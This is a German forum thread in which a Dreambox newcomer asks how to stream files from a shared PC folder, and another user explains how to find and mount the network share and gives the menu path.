Wie streamen?

    • Wie streamen?

      Hallo!

      Ich bin Dreambox-Neuling und habe eine Frage zum streamen.
      Ich möchte mit meiner Dreambox auf einen freigegebenen Ordner auf meinem PC zugreifen um die dort liegenden Dateien abzuspielen.

      Wie stelle ich das an? Mit dem Mediaplayer kann ich offensictlich nur auf den Dreambox Flash bzw. auf den angesteckten USB-Stick zugreifen.

      Was muss ich tun um Zugriff auf den PC zu bekommen?

      Danke für eure Hilfe.
    • Auf deinem PC den entsprechenden Ordner freigeben und danach an der Dreambox im Netzwerkbrwoser deinen PC und dessen Freigabe suchen lassen.

      Nachdem Die Freigabe vom PC gefunden wurde, diese einfach mounten und schon kannst du den Mount im Mediaplayer verwenden.


      mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

    • Menü -> Einstellungen -> System -> Netzwerk


      mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)